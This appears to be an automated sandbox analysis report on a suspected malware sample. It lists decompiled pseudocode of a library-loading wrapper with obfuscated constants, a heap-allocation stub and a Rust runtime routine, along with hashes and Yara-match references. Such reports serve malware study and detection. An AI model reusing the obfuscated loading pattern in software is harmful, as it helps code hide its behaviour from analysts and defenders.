                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: dded3e80e0029dda58724d1fa488d568cfbbf9f5219b092365cca0263973a868
                          • Instruction ID: cd39fced8fdfef8e2f538df30d60eb6cf02eb3369940cb9cb2d20951547c8340
                          • Opcode Fuzzy Hash: dded3e80e0029dda58724d1fa488d568cfbbf9f5219b092365cca0263973a868
                          • Instruction Fuzzy Hash: B7F02B31205625EBEBD05AF39D12A4B3749AF41F62B104011EC14A7088FBB0E50242A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00882DAA, Relevance: 1.5, APIs: 1, Instructions: 36libraryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 77%
                          			E00882DAA(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t21;
				struct HINSTANCE__* _t27;
				WCHAR* _t31;

				_push(_a8);
				_t31 = __ecx;
				_push(_a4);
				_push(__ecx);
				E0086358A(_t21);
				_v16 = 0xe4edb8;
				_v16 = _v16 + 0xffff324f;
				_v16 = _v16 ^ 0x00e4d338;
				_v12 = 0x4aa4e3;
				_v12 = _v12 | 0x47be1ae1;
				_v12 = _v12 ^ 0x47f82da6;
				_v8 = 0x5f13c8;
				_v8 = _v8 + 0xffffe959;
				_v8 = _v8 ^ 0x0055a0fc;
				E00870A93(0xf7ec3422, 5, __ecx, __ecx, 0x97da6f6d);
				_t27 = LoadLibraryW(_t31); // executed
				return _t27;
			}









                          0x00882db1
                          0x00882db4
                          0x00882db6
                          0x00882dba
                          0x00882dbb
                          0x00882dc0
                          0x00882dca
                          0x00882dd1
                          0x00882dd8
                          0x00882ddf
                          0x00882de6
                          0x00882ded
                          0x00882df4
                          0x00882dfb
                          0x00882e19
                          0x00882e22
                          0x00882e28

                          APIs
                          • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 00882E22
                          Memory Dump Source
                          • Source File: 00000005.00000002.534275093.0000000000860000.00000040.00000010.sdmp, Offset: 00860000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: fa0b9ba42ca251ba5c1ef1ce6445bbbddcbdfd736c10d6ad21ab5a4b44c371a5
                          • Instruction ID: e74f094d6cd47416b539fb322e9d1848d79066d86071c49a9a6ddcefa478ea4e
                          • Opcode Fuzzy Hash: fa0b9ba42ca251ba5c1ef1ce6445bbbddcbdfd736c10d6ad21ab5a4b44c371a5
                          • Instruction Fuzzy Hash: 230146B6C01218FBDB54EFA8890A8DEBFB8FB50310F108189E81476251E7B16B149F92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECEFC29, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,6ECEA44C,?,?,6ECE99B4,00000400,FFFDD001,?,?,?), ref: 6ECEFC5B
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 84274b9a0db7d646bad474c9477981a8fd6aa15676efc35829e5a6d0066b3c4c
                          • Instruction ID: 8402b7ad0ba7d94f8c962e4e3102a38492f5b81f5e05c8fc7762da0a7567be26
                          • Opcode Fuzzy Hash: 84274b9a0db7d646bad474c9477981a8fd6aa15676efc35829e5a6d0066b3c4c
                          • Instruction Fuzzy Hash: 77E0E531245292AFEB6116E67D11B9A3A4CAF02BE0F320520ECA196DC8FF60C44141A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 6ECDD530, Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 445memoryCOMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 81%
                          			E6ECDD530(signed int __ebx, long* __ecx, signed int __edi, long __esi, char _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				long _v40;
				void* _v44;
				void* _v48;
				long _v52;
				signed int _v56;
				void* _v60;
				signed int _v64;
				signed int _v68;
				void* _v72;
				long* _v76;
				signed int _v80;
				signed int _v1096;
				long _v1100;
				void* _v1104;
				void* __ebp;
				void* _t142;
				void* _t143;
				void* _t148;
				signed int _t149;
				intOrPtr _t151;
				void* _t155;
				void* _t157;
				signed int _t158;
				signed int _t160;
				void** _t161;
				void* _t167;
				long _t171;
				signed int _t172;
				long _t173;
				void* _t179;
				void* _t181;
				long _t194;
				signed int _t195;
				signed char _t196;
				signed int _t199;
				signed int _t200;
				signed int _t211;
				signed int _t213;
				signed int _t214;
				void* _t218;
				intOrPtr _t220;
				signed int _t223;
				intOrPtr* _t224;
				intOrPtr _t226;
				signed int _t228;
				char* _t229;
				signed int _t230;
				signed int _t232;
				signed int _t238;
				signed int _t241;
				signed int _t242;
				WCHAR* _t247;
				long _t248;
				signed int _t249;
				signed int _t252;
				char* _t264;
				void* _t265;
				void* _t267;
				void* _t268;
				signed char* _t273;
				signed int _t274;
				void* _t280;
				intOrPtr _t281;

				_t262 = __esi;
				_t245 = __edi;
				_t192 = __ebx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t281 = _t280 - 0x440;
				_v32 = _t281;
				_v20 = 0xffffffff;
				_v24 = E6ECE3B80;
				_v76 = __ecx;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t142 =  *0x6ed2adc8; // 0x760000
				if(_t142 != 0) {
					L3:
					_t143 = HeapAlloc(_t142, 0, 0xa);
					if(_t143 == 0) {
						goto L94;
					} else {
						_t264 = "UST_BACKTRACE";
						_t241 = 1;
						_t211 = 0;
						 *_t143 = 0x52;
						_v1104 = _t143;
						_v1100 = 5;
						_v1096 = 1;
						_v44 = 0;
						while(1) {
							_v36 = _t211;
							if(_t211 == 0) {
								goto L10;
							}
							_v44 = 0;
							_t211 = 0;
							if(_t241 != _v1100) {
								L6:
								_t245 = _v36;
								 *((short*)(_t143 + _t241 * 2)) = _v36;
								_t241 = _t241 + 1;
								_v1096 = _t241;
								continue;
							} else {
								L13:
								_v40 = _t264;
								_v20 = 0;
								_v48 = _t241;
								_t188 =  <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11;
								_t189 = ( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2;
								asm("sbb eax, 0x0");
								_t190 = (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2;
								E6ECF7370( &_v1104, _t241, (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2);
								_t281 = _t281 + 4;
								_t143 = _v1104;
								_t241 = _v48;
								_t264 = _v40;
								_t211 = _v44;
								goto L6;
							}
							L10:
							__eflags = _t264 - 0x6ed1d2be;
							if(_t264 != 0x6ed1d2be) {
								_t196 =  *_t264 & 0x000000ff;
								_t229 =  &(_t264[1]);
								_t249 = _t196 & 0x000000ff;
								__eflags = _t196;
								if(_t196 < 0) {
									_v36 = _t249 & 0x0000001f;
									__eflags = _t229 - 0x6ed1d2be;
									if(_t229 == 0x6ed1d2be) {
										_t230 = 0;
										__eflags = _t196 - 0xdf;
										_t252 = 0;
										_v40 = 0x6ed1d2be;
										if(_t196 > 0xdf) {
											goto L25;
										} else {
											_v36 = _v36 << 6;
											_t264 = 0x6ed1d2be;
											_t211 = 0;
											__eflags = _t241 - _v1100;
											if(_t241 != _v1100) {
												goto L6;
											} else {
												goto L13;
											}
										}
									} else {
										_t238 = _t264[1] & 0x000000ff;
										_t264 =  &(_t264[2]);
										_t230 = _t238 & 0x0000003f;
										__eflags = _t196 - 0xdf;
										if(_t196 <= 0xdf) {
											_t199 = _v36 << 0x00000006 | _t230;
											__eflags = _t199 - 0xffff;
											if(_t199 > 0xffff) {
												goto L32;
											} else {
												goto L22;
											}
										} else {
											__eflags = _t264 - 0x6ed1d2be;
											if(_t264 == 0x6ed1d2be) {
												_t252 = 0;
												__eflags = 0;
												_v40 = 0x6ed1d2be;
											} else {
												_v40 =  &(_t264[1]);
												_t252 =  *_t264 & 0x3f;
											}
											L25:
											_t232 = _t230 << 0x00000006 | _t252;
											__eflags = _t196 - 0xf0;
											if(_t196 < 0xf0) {
												_t199 = _v36 << 0x0000000c | _t232;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 > 0xffff) {
													goto L32;
												} else {
													goto L22;
												}
											} else {
												_t273 = _v40;
												__eflags = _t273 - 0x6ed1d2be;
												if(_t273 == 0x6ed1d2be) {
													_t274 = 0;
													__eflags = 0;
													_v40 = 0x6ed1d2be;
												} else {
													_v40 =  &(_t273[1]);
													_t274 =  *_t273 & 0x3f;
												}
												_t199 = _t232 << 0x00000006 | (_v36 & 0x00000007) << 0x00000012 | _t274;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 <= 0xffff) {
													L22:
													_v36 = _t199;
													_t211 = 0;
													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												} else {
													L32:
													_t200 = _t199 + 0xffff0000;
													_v40 = _t264;
													_v36 = _t200 >> 0x0000000a | 0x0000d800;
													_t264 = _v40;
													_t211 = _t200 & 0x000003ff | 0x0000dc00;
													_v44 = _t211;
													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												}
											}
										}
									}
								} else {
									_t264 = _t229;
									_v36 = _t249;
									_t211 = 0;
									__eflags = _t241 - _v1100;
									if(_t241 != _v1100) {
										goto L6;
									} else {
										goto L13;
									}
								}
								goto L96;
							}
							_t242 = _v1096;
							asm("movsd xmm0, [ebp-0x44c]");
							_v64 = _t242;
							asm("movsd [ebp-0x44], xmm0");
							__eflags = _t242 - 8;
							_t213 = _t242;
							_t148 = _v72;
							_t265 = _t148;
							if(_t242 < 8) {
								L45:
								_t214 = _t213 + _t213;
								asm("o16 nop [cs:eax+eax]");
								while(1) {
									__eflags = _t214;
									if(_t214 == 0) {
										break;
									}
									_t214 = _t214 + 0xfffffffe;
									__eflags =  *_t265;
									_t265 = _t265 + 2;
									if(__eflags != 0) {
										continue;
									} else {
										goto L48;
									}
									goto L96;
								}
								__eflags = _t242 - _v68;
								if(_t242 == _v68) {
									_v20 = 1;
									E6ECF7370( &_v72, _t242, 1);
									_t281 = _t281 + 4;
									_t148 = _v72;
									_t242 = _v64;
								}
								 *((short*)(_t148 + _t242 * 2)) = 0;
								asm("movsd xmm0, [ebp-0x44]");
								asm("movsd [ebp-0x38], xmm0");
								_t149 = _v60;
								__eflags = _t149;
								_v36 = _t149;
								if(_t149 == 0) {
									goto L75;
								} else {
									_v80 = _v56;
									E6ECEC310(_t245,  &_v1104, 0, 0x400);
									_t281 = _t281 + 0xc;
									_t155 =  *0x6ed1d0bc; // 0x2
									_t194 = 0x200;
									_t262 = 0;
									_v60 = _t155;
									_v56 = 0;
									_v48 = _t155;
									_v52 = 0;
									__eflags = 0x200 - 0x201;
									if(0x200 >= 0x201) {
										L65:
										_t157 = _t194 - _t262;
										__eflags = _v56 - _t262 - _t157;
										if(_v56 - _t262 < _t157) {
											_v44 = _t194;
											_v20 = 5;
											E6ECF7370( &_v60, _t262, _t157);
											_t281 = _t281 + 4;
											_t194 = _v44;
											_v48 = _v60;
										}
										_t247 = _v48;
										_t262 = _t194;
										_v52 = _t194;
										_v40 = _t194;
									} else {
										L68:
										_t247 =  &_v1104;
										_v40 = 0x200;
									}
									L69:
									_v44 = _t247;
									SetLastError(0);
									_t158 = GetEnvironmentVariableW(_v36, _t247, _t194);
									_t245 = _t158;
									__eflags = _t158;
									if(_t158 != 0) {
										L71:
										__eflags = _t245 - _t194;
										if(_t245 != _t194) {
											L63:
											__eflags = _t245 - _t194;
											_t192 = _t245;
											if(_t245 < _t194) {
												_t239 = _v40;
												_v20 = 5;
												__eflags = _t245 - _v40;
												if(__eflags > 0) {
													goto L95;
												} else {
													_push(_t245);
													E6ECE0EC0(_t192,  &_v72, _v44, _t245, _t262);
													_t281 = _t281 + 4;
													_t218 = _v72;
													_t248 = _v68;
													_t262 = _v64;
													_t195 = 0;
													_t160 = _v56;
													__eflags = _t160;
													if(_t160 != 0) {
														goto L81;
													} else {
													}
													goto L84;
												}
											} else {
												__eflags = _t192 - 0x201;
												if(_t192 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										} else {
											_t171 = GetLastError();
											__eflags = _t171 - 0x7a;
											if(_t171 != 0x7a) {
												goto L63;
											} else {
												_t194 = _t194 + _t194;
												__eflags = _t194 - 0x201;
												if(_t194 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										}
									} else {
										_t172 = GetLastError();
										__eflags = _t172;
										if(_t172 != 0) {
											_t195 = 1;
											_t173 = GetLastError();
											_t218 = 0;
											_t248 = _t173;
											_t160 = _v56;
											__eflags = _t160;
											if(_t160 != 0) {
												L81:
												__eflags = _v48;
												if(_v48 != 0) {
													__eflags = _t160 & 0x7fffffff;
													if((_t160 & 0x7fffffff) != 0) {
														_v44 = _t218;
														HeapFree( *0x6ed2adc8, 0, _v48);
														_t218 = _v44;
													}
												}
											}
											L84:
											__eflags = _t195;
											if(_t195 == 0) {
												_t161 = _v76;
												 *_t161 = _t218;
												_t161[1] = _t248;
												_t161[2] = _t262;
											} else {
												__eflags = _t218 - 3;
												 *_v76 = 0;
												if(_t218 == 3) {
													_v20 = 4;
													_v44 = _t248;
													 *((intOrPtr*)( *((intOrPtr*)(_t248 + 4))))( *_t248);
													_t281 = _t281 + 4;
													_t267 = _v44;
													_t220 =  *((intOrPtr*)(_t267 + 4));
													__eflags =  *(_t220 + 4);
													if( *(_t220 + 4) != 0) {
														_t167 =  *_t267;
														__eflags =  *((intOrPtr*)(_t220 + 8)) - 9;
														if( *((intOrPtr*)(_t220 + 8)) >= 9) {
															_t167 =  *(_t167 - 4);
														}
														HeapFree( *0x6ed2adc8, 0, _t167);
													}
													HeapFree( *0x6ed2adc8, 0, _t267);
												}
											}
											__eflags = _v80 & 0x7fffffff;
											if((_v80 & 0x7fffffff) != 0) {
												HeapFree( *0x6ed2adc8, 0, _v36);
											}
											goto L76;
										} else {
											goto L71;
										}
									}
								}
							} else {
								_t228 = _t242;
								_t268 = _t148;
								while(1) {
									__eflags =  *_t268;
									if( *_t268 == 0) {
										break;
									}
									__eflags =  *((short*)(_t268 + 2));
									if( *((short*)(_t268 + 2)) == 0) {
										break;
									} else {
										__eflags =  *((short*)(_t268 + 4));
										if( *((short*)(_t268 + 4)) == 0) {
											break;
										} else {
											__eflags =  *((short*)(_t268 + 6));
											if( *((short*)(_t268 + 6)) == 0) {
												break;
											} else {
												__eflags =  *((short*)(_t268 + 8));
												if( *((short*)(_t268 + 8)) == 0) {
													break;
												} else {
													__eflags =  *((short*)(_t268 + 0xa));
													if( *((short*)(_t268 + 0xa)) == 0) {
														break;
													} else {
														__eflags =  *((short*)(_t268 + 0xc));
														if( *((short*)(_t268 + 0xc)) == 0) {
															break;
														} else {
															__eflags =  *((short*)(_t268 + 0xe));
															if( *((short*)(_t268 + 0xe)) == 0) {
																break;
															} else {
																_t228 = _t228 + 0xfffffff8;
																_t268 = _t268 + 0x10;
																__eflags = _t228 - 7;
																if(_t228 > 7) {
																	continue;
																} else {
																	goto L45;
																}
															}
														}
													}
												}
											}
										}
									}
									goto L96;
								}
								L48:
								_t223 = _v68;
								_v56 = 0x6ed1dec8;
								_v60 = 0x1402;
								__eflags = _t223;
								if(_t223 != 0) {
									__eflags = _t148;
									if(_t148 != 0) {
										__eflags = _t223 & 0x7fffffff;
										if((_t223 & 0x7fffffff) != 0) {
											HeapFree( *0x6ed2adc8, 0, _t148);
										}
									}
								}
								__eflags = _v60 - 3;
								if(_v60 == 3) {
									_t224 = _v56;
									_v36 = _t224;
									_t70 = _t224 + 4; // 0x2c
									_v20 = 2;
									 *((intOrPtr*)( *_t70))( *_t224);
									_t281 = _t281 + 4;
									_t179 = _v36;
									_t226 =  *((intOrPtr*)(_t179 + 4));
									__eflags =  *(_t226 + 4);
									if( *(_t226 + 4) != 0) {
										_t181 =  *_t179;
										__eflags =  *((intOrPtr*)(_t226 + 8)) - 9;
										if( *((intOrPtr*)(_t226 + 8)) >= 9) {
											_t181 =  *(_t181 - 4);
										}
										HeapFree( *0x6ed2adc8, 0, _t181);
										_t179 = _v56;
									}
									HeapFree( *0x6ed2adc8, 0, _t179);
								}
								L75:
								 *_v76 = 0;
								L76:
								_t151 = _v28;
								 *[fs:0x0] = _t151;
								return _t151;
							}
							goto L96;
						}
					}
				} else {
					_t142 = GetProcessHeap();
					if(_t142 == 0) {
						L94:
						_t239 = 2;
						E6ECF6C30(_t192, 0xa, 2, _t245, _t262, __eflags);
						asm("ud2");
						L95:
						E6ECF6DB0(_t192, _t245, _t239, _t245, _t262, __eflags, 0x6ed1ded0);
						asm("ud2");
						__eflags =  &_a8;
						E6ECD4AA0( *_v44,  *((intOrPtr*)(_v44 + 4)));
						return E6ECDD420(_t263);
					} else {
						 *0x6ed2adc8 = _t142;
						goto L3;
					}
				}
				L96:
			}







































































                          0x6ecdd530
                          0x6ecdd530
                          0x6ecdd530
                          0x6ecdd533
                          0x6ecdd534
                          0x6ecdd535
                          0x6ecdd536
                          0x6ecdd53c
                          0x6ecdd53f
                          0x6ecdd546
                          0x6ecdd54d
                          0x6ecdd55a
                          0x6ecdd55d
                          0x6ecdd563
                          0x6ecdd56a
                          0x6ecdd57e
                          0x6ecdd583
                          0x6ecdd58a
                          0x00000000
                          0x6ecdd590
                          0x6ecdd590
                          0x6ecdd596
                          0x6ecdd59b
                          0x6ecdd59d
                          0x6ecdd5a2
                          0x6ecdd5a8
                          0x6ecdd5b2
                          0x6ecdd5bc
                          0x6ecdd5ed
                          0x6ecdd5f0
                          0x6ecdd5f3
                          0x00000000
                          0x00000000
                          0x6ecdd5f5
                          0x6ecdd5fc
                          0x6ecdd604
                          0x6ecdd5df
                          0x6ecdd5df
                          0x6ecdd5e2
                          0x6ecdd5e6
                          0x6ecdd5e7
                          0x00000000
                          0x6ecdd606
                          0x6ecdd63a
                          0x6ecdd644
                          0x6ecdd647
                          0x6ecdd64e
                          0x6ecdd659
                          0x6ecdd662
                          0x6ecdd66a
                          0x6ecdd66d
                          0x6ecdd671
                          0x6ecdd676
                          0x6ecdd5d0
                          0x6ecdd5d6
                          0x6ecdd5d9
                          0x6ecdd5dc
                          0x00000000
                          0x6ecdd5dc
                          0x6ecdd610
                          0x6ecdd616
                          0x6ecdd618
                          0x6ecdd61e
                          0x6ecdd621
                          0x6ecdd624
                          0x6ecdd627
                          0x6ecdd629
                          0x6ecdd681
                          0x6ecdd68a
                          0x6ecdd68c
                          0x6ecdd6b3
                          0x6ecdd6bb
                          0x6ecdd6be
                          0x6ecdd6c3
                          0x6ecdd6c6
                          0x00000000
                          0x6ecdd6c8
                          0x6ecdd6c8
                          0x6ecdd6cc
                          0x6ecdd6d2
                          0x6ecdd6d4
                          0x6ecdd6da
                          0x00000000
                          0x6ecdd6e0
                          0x00000000
                          0x6ecdd6e0
                          0x6ecdd6da
                          0x6ecdd68e
                          0x6ecdd68e
                          0x6ecdd692
                          0x6ecdd695
                          0x6ecdd698
                          0x6ecdd69b
                          0x6ecdd6eb
                          0x6ecdd6ed
                          0x6ecdd6f3
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecdd69d
                          0x6ecdd6a3
                          0x6ecdd6a5
                          0x6ecdd715
                          0x6ecdd715
                          0x6ecdd717
                          0x6ecdd6a7
                          0x6ecdd6ab
                          0x6ecdd6ae
                          0x6ecdd6ae
                          0x6ecdd71a
                          0x6ecdd71d
                          0x6ecdd71f
                          0x6ecdd722
                          0x6ecdd745
                          0x6ecdd747
                          0x6ecdd74a
                          0x6ecdd750
                          0x00000000
                          0x6ecdd752
                          0x00000000
                          0x6ecdd752
                          0x6ecdd724
                          0x6ecdd724
                          0x6ecdd72d
                          0x6ecdd72f
                          0x6ecdd75a
                          0x6ecdd75a
                          0x6ecdd75c
                          0x6ecdd731
                          0x6ecdd737
                          0x6ecdd73a
                          0x6ecdd73a
                          0x6ecdd76f
                          0x6ecdd771
                          0x6ecdd774
                          0x6ecdd77a
                          0x6ecdd6f9
                          0x6ecdd6f9
                          0x6ecdd6fc
                          0x6ecdd6fe
                          0x6ecdd704
                          0x00000000
                          0x6ecdd70a
                          0x00000000
                          0x6ecdd70a
                          0x6ecdd780
                          0x6ecdd780
                          0x6ecdd780
                          0x6ecdd786
                          0x6ecdd7a0
                          0x6ecdd7a3
                          0x6ecdd7a6
                          0x6ecdd7a8
                          0x6ecdd7ab
                          0x6ecdd7b1
                          0x00000000
                          0x6ecdd7b7
                          0x00000000
                          0x6ecdd7b7
                          0x6ecdd7b1
                          0x6ecdd77a
                          0x6ecdd722
                          0x6ecdd69b
                          0x6ecdd62b
                          0x6ecdd62b
                          0x6ecdd62d
                          0x6ecdd630
                          0x6ecdd632
                          0x6ecdd638
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecdd638
                          0x00000000
                          0x6ecdd629
                          0x6ecdd7bc
                          0x6ecdd7c2
                          0x6ecdd7ca
                          0x6ecdd7cd
                          0x6ecdd7d2
                          0x6ecdd7d5
                          0x6ecdd7d7
                          0x6ecdd7da
                          0x6ecdd7dc
                          0x6ecdd824
                          0x6ecdd824
                          0x6ecdd826
                          0x6ecdd830
                          0x6ecdd830
                          0x6ecdd832
                          0x00000000
                          0x00000000
                          0x6ecdd838
                          0x6ecdd83b
                          0x6ecdd83f
                          0x6ecdd842
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecdd842
                          0x6ecdd8d0
                          0x6ecdd8d3
                          0x6ecdd8d5
                          0x6ecdd8e1
                          0x6ecdd8e6
                          0x6ecdd8e9
                          0x6ecdd8ec
                          0x6ecdd8ec
                          0x6ecdd8ef
                          0x6ecdd8f5
                          0x6ecdd8fa
                          0x6ecdd8ff
                          0x6ecdd902
                          0x6ecdd904
                          0x6ecdd907
                          0x00000000
                          0x6ecdd90d
                          0x6ecdd910
                          0x6ecdd921
                          0x6ecdd926
                          0x6ecdd929
                          0x6ecdd92e
                          0x6ecdd933
                          0x6ecdd935
                          0x6ecdd938
                          0x6ecdd93f
                          0x6ecdd942
                          0x6ecdd949
                          0x6ecdd94f
                          0x6ecdd972
                          0x6ecdd977
                          0x6ecdd97b
                          0x6ecdd97d
                          0x6ecdd97f
                          0x6ecdd982
                          0x6ecdd98f
                          0x6ecdd994
                          0x6ecdd99a
                          0x6ecdd99d
                          0x6ecdd99d
                          0x6ecdd9a0
                          0x6ecdd9a3
                          0x6ecdd9a5
                          0x6ecdd9a8
                          0x6ecdd951
                          0x6ecdd9b0
                          0x6ecdd9b0
                          0x6ecdd9b6
                          0x6ecdd9b6
                          0x6ecdd9bd
                          0x6ecdd9bd
                          0x6ecdd9c2
                          0x6ecdd9cd
                          0x6ecdd9d3
                          0x6ecdd9d5
                          0x6ecdd9d7
                          0x6ecdd9e3
                          0x6ecdd9e3
                          0x6ecdd9e5
                          0x6ecdd960
                          0x6ecdd960
                          0x6ecdd962
                          0x6ecdd964
                          0x6ecdda26
                          0x6ecdda29
                          0x6ecdda30
                          0x6ecdda32
                          0x00000000
                          0x6ecdda38
                          0x6ecdda3e
                          0x6ecdda3f
                          0x6ecdda44
                          0x6ecdda47
                          0x6ecdda4a
                          0x6ecdda4d
                          0x6ecdda50
                          0x6ecdda52
                          0x6ecdda55
                          0x6ecdda57
                          0x00000000
                          0x00000000
                          0x6ecdda59
                          0x00000000
                          0x6ecdda57
                          0x6ecdd96a
                          0x6ecdd96a
                          0x6ecdd970
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecdd970
                          0x6ecdd9eb
                          0x6ecdd9eb
                          0x6ecdd9f1
                          0x6ecdd9f4
                          0x00000000
                          0x6ecdd9fa
                          0x6ecdd9fa
                          0x6ecdd9fc
                          0x6ecdda02
                          0x00000000
                          0x6ecdda04
                          0x00000000
                          0x6ecdda04
                          0x00000000
                          0x6ecdda02
                          0x6ecdd9f4
                          0x6ecdd9d9
                          0x6ecdd9d9
                          0x6ecdd9df
                          0x6ecdd9e1
                          0x6ecdda5b
                          0x6ecdda5d
                          0x6ecdda63
                          0x6ecdda65
                          0x6ecdda67
                          0x6ecdda6a
                          0x6ecdda6c
                          0x6ecdda6e
                          0x6ecdda6e
                          0x6ecdda72
                          0x6ecdda74
                          0x6ecdda79
                          0x6ecdda86
                          0x6ecdda89
                          0x6ecdda8e
                          0x6ecdda8e
                          0x6ecdda79
                          0x6ecdda72
                          0x6ecdda91
                          0x6ecdda91
                          0x6ecdda93
                          0x6ecddaed
                          0x6ecddaf0
                          0x6ecddaf2
                          0x6ecddaf5
                          0x6ecdda95
                          0x6ecdda98
                          0x6ecdda9b
                          0x6ecddaa1
                          0x6ecddaa8
                          0x6ecddab0
                          0x6ecddab3
                          0x6ecddab5
                          0x6ecddab8
                          0x6ecddabb
                          0x6ecddabe
                          0x6ecddac2
                          0x6ecddac4
                          0x6ecddac6
                          0x6ecddaca
                          0x6ecddacc
                          0x6ecddacc
                          0x6ecddad8
                          0x6ecddad8
                          0x6ecddae6
                          0x6ecddae6
                          0x6ecddaa1
                          0x6ecddaf8
                          0x6ecddaff
                          0x6ecddb10
                          0x6ecddb10
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecdd9e1
                          0x6ecdd9d7
                          0x6ecdd7de
                          0x6ecdd7de
                          0x6ecdd7e0
                          0x6ecdd7e2
                          0x6ecdd7e2
                          0x6ecdd7e6
                          0x00000000
                          0x00000000
                          0x6ecdd7e8
                          0x6ecdd7ed
                          0x00000000
                          0x6ecdd7ef
                          0x6ecdd7ef
                          0x6ecdd7f4
                          0x00000000
                          0x6ecdd7f6
                          0x6ecdd7f6
                          0x6ecdd7fb
                          0x00000000
                          0x6ecdd7fd
                          0x6ecdd7fd
                          0x6ecdd802
                          0x00000000
                          0x6ecdd804
                          0x6ecdd804
                          0x6ecdd809
                          0x00000000
                          0x6ecdd80b
                          0x6ecdd80b
                          0x6ecdd810
                          0x00000000
                          0x6ecdd812
                          0x6ecdd812
                          0x6ecdd817
                          0x00000000
                          0x6ecdd819
                          0x6ecdd819
                          0x6ecdd81c
                          0x6ecdd81f
                          0x6ecdd822
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecdd822
                          0x6ecdd817
                          0x6ecdd810
                          0x6ecdd809
                          0x6ecdd802
                          0x6ecdd7fb
                          0x6ecdd7f4
                          0x00000000
                          0x6ecdd7ed
                          0x6ecdd844
                          0x6ecdd844
                          0x6ecdd847
                          0x6ecdd84e
                          0x6ecdd855
                          0x6ecdd857
                          0x6ecdd859
                          0x6ecdd85b
                          0x6ecdd85d
                          0x6ecdd863
                          0x6ecdd86e
                          0x6ecdd86e
                          0x6ecdd863
                          0x6ecdd85b
                          0x6ecdd873
                          0x6ecdd877
                          0x6ecdd87d
                          0x6ecdd882
                          0x6ecdd885
                          0x6ecdd888
                          0x6ecdd890
                          0x6ecdd892
                          0x6ecdd895
                          0x6ecdd898
                          0x6ecdd89b
                          0x6ecdd89f
                          0x6ecdd8a1
                          0x6ecdd8a3
                          0x6ecdd8a7
                          0x6ecdd8a9
                          0x6ecdd8a9
                          0x6ecdd8b5
                          0x6ecdd8ba
                          0x6ecdd8ba
                          0x6ecdd8c6
                          0x6ecdd8c6
                          0x6ecdda09
                          0x6ecdda0c
                          0x6ecdda12
                          0x6ecdda12
                          0x6ecdda15
                          0x6ecdda25
                          0x6ecdda25
                          0x00000000
                          0x6ecdd7dc
                          0x6ecdd5ed
                          0x6ecdd56c
                          0x6ecdd56c
                          0x6ecdd573
                          0x6ecddb1a
                          0x6ecddb1f
                          0x6ecddb24
                          0x6ecddb29
                          0x6ecddb2b
                          0x6ecddb32
                          0x6ecddb3a
                          0x6ecddb44
                          0x6ecddb4f
                          0x6ecddb5f
                          0x6ecdd579
                          0x6ecdd579
                          0x00000000
                          0x6ecdd579
                          0x6ecdd573
                          0x00000000

                          APIs
                          • GetProcessHeap.KERNEL32 ref: 6ECDD56C
                          • HeapAlloc.KERNEL32(00760000,00000000,0000000A), ref: 6ECDD583
                          Strings
                          Memory Dump Source
